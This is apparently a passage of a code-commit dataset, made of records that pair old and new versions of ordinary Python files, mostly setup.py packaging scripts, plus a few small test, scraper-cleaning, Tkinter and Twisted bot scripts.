platforms = ['All'],
license = 'Apache 2.0',
)
| apache-2.0 | Python | |
6b3c3a2e0dd4f47fc014f86fa0e85d38e11366b7 | Create run_test.py | kwilcox/staged-recipes,jakirkham/staged-recipes,chrisburr/staged-recipes,igortg/staged-recipes,cpaulik/staged-recipes,basnijholt/staged-recipes,johanneskoester/staged-recipes,birdsarah/staged-recipes,NOAA-ORR-ERD/staged-recipes,guillochon/staged-recipes,jochym/staged-recipes,synapticarbors/staged-recipes,ceholden/staged-recipes,sodre/staged-recipes,isuruf/staged-recipes,rmcgibbo/staged-recipes,johanneskoester/staged-recipes,jjhelmus/staged-recipes,stuertz/staged-recipes,dschreij/staged-recipes,patricksnape/staged-recipes,petrushy/staged-recipes,chohner/staged-recipes,rvalieris/staged-recipes,petrushy/staged-recipes,mariusvniekerk/staged-recipes,guillochon/staged-recipes,mcs07/staged-recipes,chohner/staged-recipes,hadim/staged-recipes,mcs07/staged-recipes,Cashalow/staged-recipes,dschreij/staged-recipes,jjhelmus/staged-recipes,conda-forge/staged-recipes,larray-project/staged-recipes,NOAA-ORR-ERD/staged-recipes,hadim/staged-recipes,glemaitre/staged-recipes,patricksnape/staged-recipes,sodre/staged-recipes,Juanlu001/staged-recipes,asmeurer/staged-recipes,mariusvniekerk/staged-recipes,jakirkham/staged-recipes,ceholden/staged-recipes,SylvainCorlay/staged-recipes,igortg/staged-recipes,ocefpaf/staged-recipes,rvalieris/staged-recipes,sodre/staged-recipes,sannykr/staged-recipes,sannykr/staged-recipes,pmlandwehr/staged-recipes,SylvainCorlay/staged-recipes,birdsarah/staged-recipes,goanpeca/staged-recipes,synapticarbors/staged-recipes,ReimarBauer/staged-recipes,conda-forge/staged-recipes,cpaulik/staged-recipes,jochym/staged-recipes,ocefpaf/staged-recipes,barkls/staged-recipes,scopatz/staged-recipes,Cashalow/staged-recipes,basnijholt/staged-recipes,Juanlu001/staged-recipes,isuruf/staged-recipes,rmcgibbo/staged-recipes,chrisburr/staged-recipes,barkls/staged-recipes,asmeurer/staged-recipes,ReimarBauer/staged-recipes,larray-project/staged-recipes,scopatz/staged-recipes,shadowwalkersb/staged-recipes,goanpeca/staged-recipe
s,stuertz/staged-recipes,pmlandwehr/staged-recipes,shadowwalkersb/staged-recipes,glemaitre/staged-recipes,kwilcox/staged-recipes | recipes/pytest-django/run_test.py | recipes/pytest-django/run_test.py | import django
from django.conf import settings
settings.configure(INSTALLED_APPS=['pytest_django', 'django.contrib.contenttypes', 'django.contrib.auth'])
django.setup()
import pytest_django
| bsd-3-clause | Python | |
4a7a103204989af7e2b6bc97a4109d81beebd34c | Add python_requires to setup.py (#2465) | pydata/xarray,jhamman/xarray,jhamman/xarray,pydata/xarray,markelg/xray,jhamman/xray,pydata/xarray,jhamman/xarray,shoyer/xarray,shoyer/xarray,shoyer/xray,markelg/xray,chunweiyuan/xarray,xray/xray,markelg/xray | setup.py | setup.py | #!/usr/bin/env python
import sys
from setuptools import find_packages, setup
import versioneer
DISTNAME = 'xarray'
LICENSE = 'Apache'
AUTHOR = 'xarray Developers'
AUTHOR_EMAIL = 'xarray@googlegroups.com'
URL = 'https://github.com/pydata/xarray'
CLASSIFIERS = [
'Development Status :: 4 - Beta',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Intended Audience :: Science/Research',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Scientific/Engineering',
]
INSTALL_REQUIRES = ['numpy >= 1.12', 'pandas >= 0.19.2']
TESTS_REQUIRE = ['pytest >= 2.7.1']
if sys.version_info[0] < 3:
TESTS_REQUIRE.append('mock')
DESCRIPTION = "N-D labeled arrays and datasets in Python"
LONG_DESCRIPTION = """
**xarray** (formerly **xray**) is an open source project and Python package
that aims to bring the labeled data power of pandas_ to the physical sciences,
by providing N-dimensional variants of the core pandas data structures.
Our goal is to provide a pandas-like and pandas-compatible toolkit for
analytics on multi-dimensional arrays, rather than the tabular data for which
pandas excels. Our approach adopts the `Common Data Model`_ for self-
describing scientific data in widespread use in the Earth sciences:
``xarray.Dataset`` is an in-memory representation of a netCDF file.
.. _pandas: http://pandas.pydata.org
.. _Common Data Model: http://www.unidata.ucar.edu/software/thredds/current/netcdf-java/CDM
.. _netCDF: http://www.unidata.ucar.edu/software/netcdf
.. _OPeNDAP: http://www.opendap.org/
Important links
---------------
- HTML documentation: http://xarray.pydata.org
- Issue tracker: http://github.com/pydata/xarray/issues
- Source code: http://github.com/pydata/xarray
- SciPy2015 talk: https://www.youtube.com/watch?v=X0pAhJgySxk
""" # noqa
setup(name=DISTNAME,
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
license=LICENSE,
author=AUTHOR,
author_email=AUTHOR_EMAIL,
classifiers=CLASSIFIERS,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
install_requires=INSTALL_REQUIRES,
tests_require=TESTS_REQUIRE,
url=URL,
python_requires='>=2.7,!=3.0.*,!=3.1.*,!=3.2.*,!=3.3.*,!=3.4.*',
packages=find_packages(),
package_data={'xarray': ['tests/data/*']})
| #!/usr/bin/env python
import sys
from setuptools import find_packages, setup
import versioneer
DISTNAME = 'xarray'
LICENSE = 'Apache'
AUTHOR = 'xarray Developers'
AUTHOR_EMAIL = 'xarray@googlegroups.com'
URL = 'https://github.com/pydata/xarray'
CLASSIFIERS = [
'Development Status :: 4 - Beta',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Intended Audience :: Science/Research',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Topic :: Scientific/Engineering',
]
INSTALL_REQUIRES = ['numpy >= 1.12', 'pandas >= 0.19.2']
TESTS_REQUIRE = ['pytest >= 2.7.1']
if sys.version_info[0] < 3:
TESTS_REQUIRE.append('mock')
DESCRIPTION = "N-D labeled arrays and datasets in Python"
LONG_DESCRIPTION = """
**xarray** (formerly **xray**) is an open source project and Python package
that aims to bring the labeled data power of pandas_ to the physical sciences,
by providing N-dimensional variants of the core pandas data structures.
Our goal is to provide a pandas-like and pandas-compatible toolkit for
analytics on multi-dimensional arrays, rather than the tabular data for which
pandas excels. Our approach adopts the `Common Data Model`_ for self-
describing scientific data in widespread use in the Earth sciences:
``xarray.Dataset`` is an in-memory representation of a netCDF file.
.. _pandas: http://pandas.pydata.org
.. _Common Data Model: http://www.unidata.ucar.edu/software/thredds/current/netcdf-java/CDM
.. _netCDF: http://www.unidata.ucar.edu/software/netcdf
.. _OPeNDAP: http://www.opendap.org/
Important links
---------------
- HTML documentation: http://xarray.pydata.org
- Issue tracker: http://github.com/pydata/xarray/issues
- Source code: http://github.com/pydata/xarray
- SciPy2015 talk: https://www.youtube.com/watch?v=X0pAhJgySxk
""" # noqa
setup(name=DISTNAME,
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
license=LICENSE,
author=AUTHOR,
author_email=AUTHOR_EMAIL,
classifiers=CLASSIFIERS,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
install_requires=INSTALL_REQUIRES,
tests_require=TESTS_REQUIRE,
url=URL,
packages=find_packages(),
package_data={'xarray': ['tests/data/*']})
| apache-2.0 | Python |
09d2d84c73bd3c232bdc78d1c46be43c676ef7ac | remove email | adriangb/scikeras | setup.py | setup.py | #!/usr/bin/env python
"""The setup script."""
from setuptools import setup, find_packages
with open("README.md") as readme_file:
readme = readme_file.read()
with open("HISTORY.md") as history_file:
history = history_file.read()
with open("requirements.txt") as f:
requirements = f.read().splitlines()
setup_requirements = [
"pytest-runner",
]
test_requirements = [
"pytest>=3",
]
setup(
author="Adrian Garcia Badaracco",
python_requires=">=3.6",
classifiers=[
"Development Status :: 2 - Pre-Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
],
description="Scikit-Learn API implementation for Keras.",
install_requires=requirements,
license="MIT license",
long_description=readme + "\n\n" + history,
long_description_content_type="text/markdown",
include_package_data=True,
keywords="scikeras",
name="scikeras",
packages=find_packages(include=["scikeras", "scikeras.*"]),
setup_requires=setup_requirements,
test_suite="tests",
tests_require=test_requirements,
url="https://github.com/adriangb/scikeras",
version="0.1.7",
zip_safe=False,
)
| mit | Python | |
f0ad13539a040fe019cc299979caa5764b581faf | Add simple setuptools based build script | qnorsten/svtplay-dl,OakNinja/svtplay-dl,selepo/svtplay-dl,leakim/svtplay-dl,dalgr/svtplay-dl,leakim/svtplay-dl,olof/svtplay-dl,leakim/svtplay-dl,iwconfig/svtplay-dl,qnorsten/svtplay-dl,dalgr/svtplay-dl,spaam/svtplay-dl,OakNinja/svtplay-dl,olof/svtplay-dl,OakNinja/svtplay-dl,selepo/svtplay-dl,iwconfig/svtplay-dl,spaam/svtplay-dl | setup.py | setup.py | #!/usr/bin/env python
from setuptools import setup, find_packages
import sys
setup(
name = "svtplay-dl",
version = "0.9.2013.03.06", # FIXME - extract from svtplay-dl
packages = find_packages(
'lib',
exclude=["tests", "*.tests", "*.tests.*"]),
package_dir = {'': 'lib'},
scripts = ['svtplay-dl'],
author = "Johan Andersson",
author_email = "j@i19.se",
description = "Command-line program to download videos from various video on demand sites",
license = "MIT",
url = "https://github.com/spaam/svtplay-dl",
)
| mit | Python | |
7fb257178f032feaa13a7761cf242f8be202b07d | Add setup.py | BuzzFeedNews/bikeshares | setup.py | setup.py | import sys
from setuptools import setup, find_packages
setup(
name="bikeshares",
version="0.0.0",
description="Standardized access to the data published by bicycle sharing programs.",
long_description="",
classifiers=[
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.3"
],
keywords="bikeshare citibike hubway divvy",
author="Jeremy Singer-Vine",
author_email="jsvine@gmail.com",
url="http://github.com/buzzfeednews/bikeshares/",
license="MIT",
packages=find_packages(exclude=["test",]),
namespace_packages=[],
include_package_data=False,
zip_safe=False,
install_requires=[
"pandas",
],
tests_require=[],
test_suite="test",
entry_points={
"console_scripts": [
]
}
)
| mit | Python | |
1f16c8d71ef550c92f3f1851a8b1a94285675eb2 | add setup.py | zencoder/zencoder-py,torchbox/zencoder-py,pbs/zencoder-py | setup.py | setup.py |
from distutils.core import setup
setup(name='zencoder',
version='0.1',
description='Integration library for Zencoder',
author='Alex Schworer',
author_email='alex.schworer@gmail.com',
url='http://github.com/schworer/zencoder-py',
license="MIT License",
packages=['zencoder']
)
| mit | Python | |
e5023ed11a8aff0b84b330bad2796bb28f93483b | add basic setuptools setup.py | opmuse/opmuse,opmuse/opmuse,opmuse/opmuse,opmuse/opmuse | setup.py | setup.py | import os.path
import re
import subprocess
from setuptools import setup
from pip.req import parse_requirements
project_root = os.path.dirname(os.path.abspath(__file__))
git_version = subprocess.check_output(['git', 'describe', 'HEAD', '--tags']).strip().decode('utf8')
git_url = 'https://raw.github.com/opmuse/opmuse/%s/%%s' % git_version
install_requires = []
dependency_links = []
for install_require in parse_requirements('requirements.txt'):
if install_require.req is not None:
install_requires.append(str(install_require.req))
elif install_require.url is not None:
dependency_links.append(git_url % re.sub(r'^file://%s/' % project_root, '', install_require.url))
else:
raise Exception("Couldn't parse requirement from requirements.txt")
setup(
name="opmuse",
version=git_version,
packages=['opmuse'],
description="A web application to play, organize and share your music library.",
author="Mattias Fliesberg",
author_email="mattias.fliesberg@gmail.com",
url="http://opmu.se/",
license="GPLv3",
install_requires=install_requires,
dependency_links=dependency_links,
entry_points={
'console_scripts': [
'opmuse = opmuse.boot'
]
}
)
| agpl-3.0 | Python | |
4364b952701b6ce3883094676ea9d8d93757cbde | Add bare setup.py | teddywing/django-sneak-peek | setup.py | setup.py | import os
from setuptools import setup, find_packages
setup(
name='django-sneak-peek',
version='0.0.1',
description='',
long_description='',
url='',
license='MIT',
author='Teddy Wing',
author_email='',
include_package_data=True,
packages=find_packages(),
classifiers=[],
) | mit | Python | |
14aa0c03673abea5cbd954aafb909b581c8ce849 | Add setup.py | vshymanskyy/blynk-library-python | setup.py | setup.py | #!/usr/bin/env python
from setuptools import setup
setup(
name = "blynk-library-python",
version = "0.1.0", #blynk.lib.__version__
description = "Blynk library",
platforms = "any",
url = "http://www.blynk.cc",
license = "MIT",
author = "Volodymyr Shymanskyy",
author_email = "vshymanskyi@gmail.com",
py_modules = ['BlynkLib'],
classifiers = [
"Topic :: Software Development :: Libraries :: Python Modules",
"Development Status :: 2 - Pre-Alpha",
"License :: OSI Approved :: MIT License",
"Operating System :: POSIX :: Linux",
"Operating System :: Microsoft :: Windows",
"Operating System :: MacOS :: MacOS X"
]
)
| mit | Python | |
1b96dbf3882301dbfa8d8d102f1cead2e2b0447d | bump version | autopulated/yotta,eyeye/yotta,BlackstoneEngineering/yotta,BlackstoneEngineering/yotta,autopulated/yotta,eyeye/yotta,stevenewey/yotta,stevenewey/yotta,ARMmbed/yotta,ARMmbed/yotta | setup.py | setup.py | # Copyright 2014-2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0
# See LICENSE file for details.
import os
from setuptools import setup, find_packages
# Utility function to cat in a file (used for the README)
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
# we need 'ntfsutils' in Windows
if os.name == 'nt':
platform_deps = ['ntfsutils>=0.1.3,<0.2']
entry_points={
"console_scripts": [
"yotta=yotta:main",
"yt=yotta:main",
],
}
scripts = []
else:
platform_deps = []
# entry points are nice, but add ~100ms to startup time with all the
# pkg_resources infrastructure, so we use scripts= instead on unix-y
# platforms:
scripts = ['bin/yotta', 'bin/yt']
entry_points = {}
setup(
name = "yotta",
version = "0.7.0",
author = "James Crosby",
author_email = "James.Crosby@arm.com",
description = ("Re-usable components for embedded software."),
license = "Apache-2.0",
keywords = "embedded package module dependency management",
url = "about:blank",
packages=find_packages(),
package_data={
'yotta': ['lib/schema/*.json', 'lib/templates/*.txt', 'lib/templates/*.cmake']
},
long_description=read('readme.md'),
classifiers=[
"Development Status :: 3 - Alpha",
"Topic :: Utilities",
"License :: OSI Approved :: Apache Software License",
"Environment :: Console",
],
entry_points=entry_points,
scripts=scripts,
test_suite = 'yotta.test',
install_requires=[
'semantic_version>=2.3.1,<3',
'requests>=2.4.3,<3',
'PyGithub>=1.25,<2',
'colorama>=0.3,<0.4',
'hgapi>=1.7,<2',
'Jinja2>=2.7.0,<3',
'cryptography>=0.8',
'PyJWT>=1.0,<2.0',
'pathlib>=1.0.1,<1.1',
'jsonschema>=2.4.0,<3.0',
'argcomplete>=0.8.0,<1.0',
'mbed_test_wrapper>=0.0.2,<0.1.0',
'valinor>=0.0.0,<1.0',
'intelhex>=2.0,<3.0'
] + platform_deps
)
| # Copyright 2014-2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0
# See LICENSE file for details.
import os
from setuptools import setup, find_packages
# Utility function to cat in a file (used for the README)
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
# we need 'ntfsutils' in Windows
if os.name == 'nt':
platform_deps = ['ntfsutils>=0.1.3,<0.2']
entry_points={
"console_scripts": [
"yotta=yotta:main",
"yt=yotta:main",
],
}
scripts = []
else:
platform_deps = []
# entry points are nice, but add ~100ms to startup time with all the
# pkg_resources infrastructure, so we use scripts= instead on unix-y
# platforms:
scripts = ['bin/yotta', 'bin/yt']
entry_points = {}
setup(
name = "yotta",
version = "0.6.2",
author = "James Crosby",
author_email = "James.Crosby@arm.com",
description = ("Re-usable components for embedded software."),
license = "Apache-2.0",
keywords = "embedded package module dependency management",
url = "about:blank",
packages=find_packages(),
package_data={
'yotta': ['lib/schema/*.json', 'lib/templates/*.txt', 'lib/templates/*.cmake']
},
long_description=read('readme.md'),
classifiers=[
"Development Status :: 3 - Alpha",
"Topic :: Utilities",
"License :: OSI Approved :: Apache Software License",
"Environment :: Console",
],
entry_points=entry_points,
scripts=scripts,
test_suite = 'yotta.test',
install_requires=[
'semantic_version>=2.3.1,<3',
'requests>=2.4.3,<3',
'PyGithub>=1.25,<2',
'colorama>=0.3,<0.4',
'hgapi>=1.7,<2',
'Jinja2>=2.7.0,<3',
'cryptography>=0.8',
'PyJWT>=1.0,<2.0',
'pathlib>=1.0.1,<1.1',
'jsonschema>=2.4.0,<3.0',
'argcomplete>=0.8.0,<1.0',
'mbed_test_wrapper>=0.0.2,<0.1.0',
'valinor>=0.0.0,<1.0',
'intelhex>=2.0,<3.0'
] + platform_deps
)
| apache-2.0 | Python |
6e601d9720139bbb04c1fd30dc6552730270ba0a | Fix the versioned Django, we're grabbing 1.4.1 off the requirements.txt | sunlightlabs/billy,loandy/billy,mileswwatkins/billy,sunlightlabs/billy,openstates/billy,loandy/billy,loandy/billy,openstates/billy,mileswwatkins/billy,mileswwatkins/billy,sunlightlabs/billy,openstates/billy | setup.py | setup.py | #!/usr/bin/env python
from setuptools import setup, find_packages
from billy import __version__
long_description = open('README.rst').read()
setup(name='billy',
version=__version__,
packages=find_packages(),
package_data={'billy': ['schemas/*.json',
'schemas/api/*.json',
'schemas/relax/api.rnc'],
'billy.web.admin': ['templates/billy/*.html'],
},
author="James Turk",
author_email="jturk@sunlightfoundation.com",
license="GPL v3",
url="http://github.com/sunlightlabs/billy/",
description='scraping, storing, and sharing legislative information',
long_description=long_description,
platforms=['any'],
entry_points="""
[console_scripts]
billy-scrape = billy.bin.update:scrape_compat_main
billy-update = billy.bin.update:main
billy-util = billy.bin.util:main
""",
install_requires=[
"Django>=1.4",
"argparse==1.1",
"boto",
"django-piston",
"icalendar",
"lxml>=2.2",
"name_tools>=0.1.2",
"nose",
"pymongo>=2.2",
"scrapelib>=0.7.0",
"unicodecsv",
"validictory>=0.7.1",
"pyes",
]
)
| #!/usr/bin/env python
from setuptools import setup, find_packages
from billy import __version__
long_description = open('README.rst').read()
setup(name='billy',
version=__version__,
packages=find_packages(),
package_data={'billy': ['schemas/*.json',
'schemas/api/*.json',
'schemas/relax/api.rnc'],
'billy.web.admin': ['templates/billy/*.html'],
},
author="James Turk",
author_email="jturk@sunlightfoundation.com",
license="GPL v3",
url="http://github.com/sunlightlabs/billy/",
description='scraping, storing, and sharing legislative information',
long_description=long_description,
platforms=['any'],
entry_points="""
[console_scripts]
billy-scrape = billy.bin.update:scrape_compat_main
billy-update = billy.bin.update:main
billy-util = billy.bin.util:main
""",
install_requires=[
"Django==1.4",
"argparse==1.1",
"boto",
"django-piston",
"icalendar",
"lxml>=2.2",
"name_tools>=0.1.2",
"nose",
"pymongo>=2.2",
"scrapelib>=0.7.0",
"unicodecsv",
"validictory>=0.7.1",
"pyes",
]
)
| bsd-3-clause | Python |
e38e0789f65e174770aeca44abec9e3e47503cbb | include user-extensions.js containing flex methods into installation | bs00336332/robotframework-seleniumlibrary,ramsundhar20/robotframework-seleniumlibrary,bs00336332/robotframework-seleniumlibrary,sourabhkt/robotframework-seleniumlibrary,sagarpabba/robotframework-seleniumlibrary,jadooman/robotframework-seleniumlibrary,qitaos/robotframework-seleniumlibrary,bs00336332/robotframework-seleniumlibrary,caleeli/robotframework-seleniumlibrary,sagarpabba/robotframework-seleniumlibrary,sagarpabba/robotframework-seleniumlibrary,sourabhkt/robotframework-seleniumlibrary,sourabhkt/robotframework-seleniumlibrary,jadooman/robotframework-seleniumlibrary,ramsundhar20/robotframework-seleniumlibrary,qitaos/robotframework-seleniumlibrary,qitaos/robotframework-seleniumlibrary,ramsundhar20/robotframework-seleniumlibrary,caleeli/robotframework-seleniumlibrary,caleeli/robotframework-seleniumlibrary,jadooman/robotframework-seleniumlibrary | setup.py | setup.py | #!/usr/bin/env python
from distutils.core import setup
from os.path import abspath, dirname, join
execfile(join(dirname(abspath(__file__)), 'src', 'SeleniumLibrary', 'version.py'))
setup(name = 'robotframework-seleniumlibrary',
version = VERSION,
description = 'Web testing library for Robot Framework',
author = 'Robot Framework Developers',
author_email = 'robotframework-users@googlegroups.com',
url = 'http://code.google.com/p/robotframework-seleniumlibrary',
package_dir = {'' : 'src'},
packages = ['SeleniumLibrary'],
package_data = {'SeleniumLibrary': ['lib/*.jar',
'lib/user-extensions.js',
'firefoxprofile/*.*']},
)
| #!/usr/bin/env python
from distutils.core import setup
from os.path import abspath, dirname, join
execfile(join(dirname(abspath(__file__)), 'src', 'SeleniumLibrary', 'version.py'))
setup(name = 'robotframework-seleniumlibrary',
version = VERSION,
description = 'Web testing library for Robot Framework',
author = 'Robot Framework Developers',
author_email = 'robotframework-users@googlegroups.com',
url = 'http://code.google.com/p/robotframework-seleniumlibrary',
package_dir = {'' : 'src'},
packages = ['SeleniumLibrary'],
package_data = {'SeleniumLibrary': ['lib/*.jar', 'firefoxprofile/*.*']},
)
| apache-2.0 | Python |
cd9aea1addd55be7c9d8adfb91137d9581af9317 | Add minimum setup.py | gchandrasa/expertsender | setup.py | setup.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
setup(
name='expertsender',
version='0.1.0',
description='Python API library for the ExpertSender email platform',
author='Gilang Chandrasa',
author_email='gilang@launchpotato.com',
url='https://github.com/gchandrasa/expertsender',
packages=[
'expertsender',
],
package_dir={'expertsender':
'expertsender'},
install_requires=[
"requests",
"lxml",
],
)
| mit | Python | |
fb4034da63c69e653441417e6037fe72127f0a8a | Create step1.py | gangulydebojyoti/method-for-security-system-bypassing | step1.py | step1.py | from Tkinter import *
import time
import sqlite3 as lite
import random
root=Tk()
a4=[]
m1=0
m2=0
m3=0
a5=[]
a6=''
from tkMessageBox import *
def check1():
h=en.get()
if(h==a6):
t2=time.time()
t3=t2-t1
print "t3 is: ",t3
cur.execute("insert into pro_crypto values(?,?,?,?)",(m1,m2,m3,t3,))
c.commit()
else:
showinfo('','you have entered wrong')
## print "m1 is: ",m1
## print "t3 is: ",t3
## cur.execute("insert into pro_crypto values(?,?,?,?)",(m1,m2,m3,t3,))
## print t3
## en=Entry(root)
## en.grid(row=1,column=1)
check()
def check():
## en=Entry(root)
## en.grid(row=1,column=1)
global m1,m2,m3,a6,t3,t2,t1,en
en=Entry(root)
en.grid(row=1,column=1)
a1=['a','q','w','s','d','z','x','c','e']
a2=['r','t','y','f','g','h','v','b','n']
a3=['u','i','o','p','j','k','l','m']
for k in range(0,6):
a4.append(random.choice(a1[random.randint(0,8)]+a2[random.randint(0,8)]+a3[random.randint(0,7)]))
print a4
m1=0
m2=0
m3=0
for i in range(0,6):
if(a4[i] in a1):
m1=int(m1)+1
elif(a4[i] in a2):
m2=int(m2)+1
elif(a4[i] in a3):
m3=int(m3)+1
a6=''
for i in range(0,6):
a6 +=str(a4[i])
a4[:]=[]
print 'm1 is',m1
print 'm2 is',m2
print 'm3 is',m3
Label(root,text=a6).grid(row=1,column=0)
t1=time.time()
print 'a6 is',a6
## t2=time.time()
## if(h==a6):
##
## t3=t2-t1
## print "m1 is: ",m1
## print "t3 is: ",t3
## cur.execute("insert into pro_crypto values(?,?)",(m1,m2,m3,t3,))
## print t3
## c.commit()
Label(root,text="Please enter the words in the box::").grid(row=0,column=0)
Button(root,text='Next',command=check1).grid(row=2,column=2)
c=lite.connect("project10.db")
cur=c.cursor()
cur.execute("create table pro_crypto(Category1 varchar(20),Category2 varchar(20),Category3 varchar(20),Time varchar(20))")
##cur.execute("insert into user values('raj','saha')")
check()
root.mainloop()
| unlicense | Python | |
dd37a333a84fb6c636a26a3d96d56925c0ec06a8 | Create cleaner.py | DataScience-appliquee/Plateforme-prediction-velov,DataScience-appliquee/Plateforme-prediction-velov | Meteo/meteociel/cleaner.py | Meteo/meteociel/cleaner.py | #!/usr/bin/python
# -*- coding: UTF-8 -*-
def cleaner(source):
"Clean all source code to make something sweet or at least, trying to"
# Brute encode to utf-8 because source code looks like a mix between iso-8859-1 and something else (kind of a joke isn't it ?)
# It seems to be ok but at html.fromString(trueCode) it's going crazy, it changes string's charset
# which is making me crazy. Doesn't matter, I have another solution ;)
#source = source.encode("utf-8")
#source = UnicodeDammit(source)
#source = source.unicode_markup
# Getting the one and only useful code in all of this garbage
startIndex = source.index("<table width=100% border=1 cellpadding=1 cellspacing=0 bordercolor=#C0C8FE bgcolor=#EBFAF7>")
startingCode = source[startIndex:]
endIndex = startingCode.index("</table>")
trueCode = startingCode[:endIndex+8]
# It would have been easier if it worked on this shitty website source code...
#print(clean_html(trueCode))
# but instead, I have to clean this mess manually...
trueCode = trueCode.replace("<br>", "")
trueCode = trueCode.replace("<i>", "")
trueCode = trueCode.replace("</i>", "")
trueCode = trueCode.replace("<b>", "")
trueCode = trueCode.replace("</b>", "")
trueCode = trueCode.replace(" ", " ")
trueCode = trueCode.replace(" ", "")
trueCode = trueCode.replace(" align=center", "")
trueCode = trueCode.replace(" align=\"center\"", "")
trueCode = trueCode.replace(" colspan=2", "")
trueCode = trueCode.replace("<div>", "")
trueCode = trueCode.replace("</div>", "")
# Delete all units
trueCode = trueCode.replace(" hPa", "")
trueCode = trueCode.replace(" h", "")
trueCode = trueCode.replace(" km/h", "")
trueCode = trueCode.replace("%", "")
trueCode = trueCode.replace(" km", "")
trueCode = trueCode.replace(" aucune", "0")
#... and apply my encoding charset solution !
trueCode = trueCode.replace(u"\xe9", "e")
trueCode = trueCode.replace(u" \xb0C", "")
return trueCode
| mit | Python | |
7736c11b005f9baefc7ba9c35884deddc56bc191 | Test file to check if twistd is working | HubbeKing/Hubbot_Twisted | test.tac | test.tac | from twisted.application import internet, service
from hubbebot import *
application = service.Application("AllTheHubbeBots")
internet.TCPClient("irc.desertbus.org", 6667, HubbeBotFactory()).setServiceParent(application)
| mit | Python | |
24e914da9e0e38728d862ecc82f8443a3b88e68f | add expression to improve the domain | Danisan/odoo-1,fdvarela/odoo8,tvtsoft/odoo8,xzYue/odoo,sysadminmatmoz/OCB,hopeall/odoo,papouso/odoo,hip-odoo/odoo,savoirfairelinux/odoo,patmcb/odoo,goliveirab/odoo,lombritz/odoo,avoinsystems/odoo,makinacorpus/odoo,shingonoide/odoo,acshan/odoo,sve-odoo/odoo,jfpla/odoo,MarcosCommunity/odoo,bkirui/odoo,camptocamp/ngo-addons-backport,jolevq/odoopub,n0m4dz/odoo,SerpentCS/odoo,vrenaville/ngo-addons-backport,klunwebale/odoo,rschnapka/odoo,ramitalat/odoo,shivam1111/odoo,bkirui/odoo,stephen144/odoo,podemos-info/odoo,Bachaco-ve/odoo,omprakasha/odoo,datenbetrieb/odoo,ygol/odoo,shaufi10/odoo,jeasoft/odoo,markeTIC/OCB,frouty/odoogoeen,damdam-s/OpenUpgrade,synconics/odoo,hanicker/odoo,shaufi10/odoo,pedrobaeza/OpenUpgrade,pedrobaeza/OpenUpgrade,javierTerry/odoo,inspyration/odoo,ShineFan/odoo,cedk/odoo,odooindia/odoo,poljeff/odoo,colinnewell/odoo,NeovaHealth/odoo,Antiun/odoo,Daniel-CA/odoo,vnsofthe/odoo,RafaelTorrealba/odoo,grap/OCB,collex100/odoo,rschnapka/odoo,nhomar/odoo,dalegregory/odoo,jaxkodex/odoo,janocat/odoo,bguillot/OpenUpgrade,nuuuboo/odoo,stephen144/odoo,JCA-Developpement/Odoo,shingonoide/odoo,nitinitprof/odoo,jiachenning/odoo,florian-dacosta/OpenUpgrade,MarcosCommunity/odoo,hifly/OpenUpgrade,deKupini/erp,codekaki/odoo,guewen/OpenUpgrade,fjbatresv/odoo,abstract-open-solutions/OCB,naousse/odoo,klunwebale/odoo,windedge/odoo,collex100/odoo,kittiu/odoo,Noviat/odoo,dllsf/odootest,JonathanStein/odoo,tinkhaven-organization/odoo,apanju/odoo,steedos/odoo,lgscofield/odoo,slevenhagen/odoo,hbrunn/OpenUpgrade,VielSoft/odoo,Endika/OpenUpgrade,VielSoft/odoo,PongPi/isl-odoo,VitalPet/odoo,sysadminmatmoz/OCB,jusdng/odoo,hanicker/odoo,csrocha/OpenUpgrade,credativUK/OCB,leoliujie/odoo,gsmartway/odoo,abstract-open-solutions/OCB,Ichag/odoo,0k/odoo,VitalPet/odoo,erkrishna9/odoo,jpshort/odoo,virgree/odoo,shaufi/odoo,takis/odoo,ehirt/odoo,BT-fgarbely/odoo,odoo-turkiye/odoo,FlorianLudwig/odoo,dllsf/odootest,glovebx
